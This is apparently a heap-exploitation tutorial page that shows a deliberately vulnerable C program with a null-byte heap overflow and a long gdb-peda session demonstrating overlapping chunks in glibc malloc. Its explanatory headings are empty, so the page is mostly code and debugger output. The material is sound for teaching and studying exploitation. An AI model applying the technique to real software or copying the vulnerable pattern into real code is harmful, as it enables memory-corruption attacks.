<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

Excuse the ads! We need some help to keep our site up.

<div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'ko', layout: google.translate.TranslateElement.InlineLayout.SIMPLE, multilanguagePage: true, gaTrack: true, gaId: 'UA-92563911-1'}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

List

Conditions

Exploit plan

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main()
{	
	char *buf1 = malloc(0x80);
	char *buf2 = malloc(0x200);
	char *buf3 = malloc(0x80);

	scanf("%512s",buf2);

	free(buf2);

	scanf("%136s",buf1);	

	char *buf4 = malloc(0x80);
	char *buf5 = malloc(0x80);

	memset(buf5,'A',0x80);

	free(buf4);
	free(buf3);
	
	char *buf6 = malloc(0x280);
	memset(buf6,'B',0x280);
}

Exploit flow

Debugging

gdb-peda$ b *0x0000000000400670
Breakpoint 1 at 0x400670
gdb-peda$ b *0x0000000000400681
Breakpoint 2 at 0x400681
gdb-peda$ b *0x0000000000400697
Breakpoint 3 at 0x400697
gdb-peda$ b *0x00000000004006a1
Breakpoint 4 at 0x4006a1
gdb-peda$ b *0x00000000004006af
Breakpoint 5 at 0x4006af
gdb-peda$ b *0x00000000004006c9
Breakpoint 6 at 0x4006c9
gdb-peda$ b *0x00000000004006d5
Breakpoint 7 at 0x4006d5
gdb-peda$ b *0x00000000004006e1
Breakpoint 8 at 0x4006e1
gdb-peda$ b *0x00000000004006eb
Breakpoint 9 at 0x4006eb
gdb-peda$ b *0x0000000000400705
Breakpoint 10 at 0x400705
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/def/poisonNullByte 
Breakpoint 1, 0x0000000000400670 in main ()

gdb-peda$ x/104gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x0000000000000000	0x0000000000000000
...
0x602080:	0x0000000000000000	0x0000000000000000
0x602090:	0x0000000000000000	0x0000000000000211
0x6020a0:	0x0000000000000000	0x0000000000000000
...
0x602290:	0x0000000000000000	0x0000000000000000
0x6022a0:	0x0000000000000000	0x0000000000000091
0x6022b0:	0x0000000000000000	0x0000000000000000
...
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ ni
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

0x0000000000400675 in main ()
gdb-peda$ x/66gx 0x6020a0
0x6020a0:	0x4343434343434343	0x4343434343434343
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x4343434343434343	0x4343434343434343
0x602130:	0x4343434343434343	0x4343434343434343
0x602140:	0x4343434343434343	0x4343434343434343
0x602150:	0x4343434343434343	0x4343434343434343
0x602160:	0x4343434343434343	0x4343434343434343
0x602170:	0x4343434343434343	0x4343434343434343
0x602180:	0x4343434343434343	0x4343434343434343
0x602190:	0x4343434343434343	0x4343434343434343
0x6021a0:	0x4343434343434343	0x4343434343434343
0x6021b0:	0x4343434343434343	0x4343434343434343
0x6021c0:	0x4343434343434343	0x4343434343434343
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x4343434343434343	0x4343434343434343
0x6022a0:	0x0000000000000000	0x0000000000000091
gdb-peda$ set *0x602290 = 0x200
gdb-peda$ set *0x602294 = 0x0
gdb-peda$ x/gx 0x602290
0x602290:	0x0000000000000200
gdb-peda$
gdb-peda$ c
Continuing.

Breakpoint 2, 0x0000000000400681 in main ()
gdb-peda$ x/6gx 0x602090
0x602090:	0x0000000000000000	0x0000000000000211
0x6020a0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
gdb-peda$ 

gdb-peda$ p main_arena.bins[1]
$1 = (mchunkptr) 0x602090
gdb-peda$ c
Continuing.
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Breakpoint 3, 0x0000000000400697 in main ()
gdb-peda$ x/24gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x4444444444444444	0x4444444444444444
0x602020:	0x4444444444444444	0x4444444444444444
0x602030:	0x4444444444444444	0x4444444444444444
0x602040:	0x4444444444444444	0x4444444444444444
0x602050:	0x4444444444444444	0x4444444444444444
0x602060:	0x4444444444444444	0x4444444444444444
0x602070:	0x4444444444444444	0x4444444444444444
0x602080:	0x4444444444444444	0x4444444444444444
0x602090:	0x4444444444444444	0x0000000000000200
0x6020a0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
gdb-peda$
gdb-peda$ c
Continuing.

Breakpoint 4, 0x00000000004006a1 in main ()
gdb-peda$ i r rax
rax            0x6020a0	0x6020a0

gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602120
gdb-peda$ c
Continuing.

Breakpoint 5, 0x00000000004006af in main ()
gdb-peda$ i r rax
rax            0x602130	0x602130
gdb-peda$ p main_arena.bins[1]
$3 = (mchunkptr) 0x6021b0
gdb-peda$ 
gdb-peda$ c
Continuing.
Breakpoint 6, 0x00000000004006c9 in main ()
gdb-peda$ x/18gx 0x602130
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
gdb-peda$ 
gdb-peda$ c
Continuing.

Breakpoint 7, 0x00000000004006d5 in main ()
gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000091
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd37b8	0x0000000000602090
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
gdb-peda$ c
Continuing.
Breakpoint 8, 0x00000000004006e1 in main ()

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000020f71
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
gdb-peda$ c
Continuing.

Breakpoint 9, 0x00000000004006eb in main ()
gdb-peda$ i r rax
rax            0x6020a0	0x6020a0

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000291
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd3888	0x00007ffff7dd3888
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000020ce1
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
gdb-peda$ c
Continuing.
Breakpoint 10, 0x0000000000400705 in main ()

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000291
0x6020a0:	0x4242424242424242	0x4242424242424242
0x6020b0:	0x4242424242424242	0x4242424242424242
0x6020c0:	0x4242424242424242	0x4242424242424242
0x6020d0:	0x4242424242424242	0x4242424242424242
0x6020e0:	0x4242424242424242	0x4242424242424242
0x6020f0:	0x4242424242424242	0x4242424242424242
0x602100:	0x4242424242424242	0x4242424242424242
0x602110:	0x4242424242424242	0x4242424242424242
0x602120:	0x4242424242424242	0x4242424242424242
0x602130:	0x4242424242424242	0x4242424242424242
0x602140:	0x4242424242424242	0x4242424242424242
0x602150:	0x4242424242424242	0x4242424242424242
0x602160:	0x4242424242424242	0x4242424242424242
0x602170:	0x4242424242424242	0x4242424242424242
0x602180:	0x4242424242424242	0x4242424242424242
0x602190:	0x4242424242424242	0x4242424242424242
0x6021a0:	0x4242424242424242	0x4242424242424242
0x6021b0:	0x4242424242424242	0x4242424242424242
0x6021c0:	0x4242424242424242	0x4242424242424242
0x6021d0:	0x4242424242424242	0x4242424242424242
0x6021e0:	0x4242424242424242	0x4242424242424242
0x6021f0:	0x4242424242424242	0x4242424242424242
0x602200:	0x4242424242424242	0x4242424242424242
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x4242424242424242	0x4242424242424242
0x602230:	0x4242424242424242	0x4242424242424242
0x602240:	0x4242424242424242	0x4242424242424242
0x602250:	0x4242424242424242	0x4242424242424242
0x602260:	0x4242424242424242	0x4242424242424242
0x602270:	0x4242424242424242	0x4242424242424242
0x602280:	0x4242424242424242	0x4242424242424242
0x602290:	0x4242424242424242	0x4242424242424242
0x6022a0:	0x4242424242424242	0x4242424242424242
0x6022b0:	0x4242424242424242	0x4242424242424242
0x6022c0:	0x4242424242424242	0x4242424242424242
0x6022d0:	0x4242424242424242	0x4242424242424242
0x6022e0:	0x4242424242424242	0x4242424242424242
0x6022f0:	0x4242424242424242	0x4242424242424242
0x602300:	0x4242424242424242	0x4242424242424242
0x602310:	0x4242424242424242	0x4242424242424242
0x602320:	0x0000000000000000	0x0000000000020ce1
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 

Related information

<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>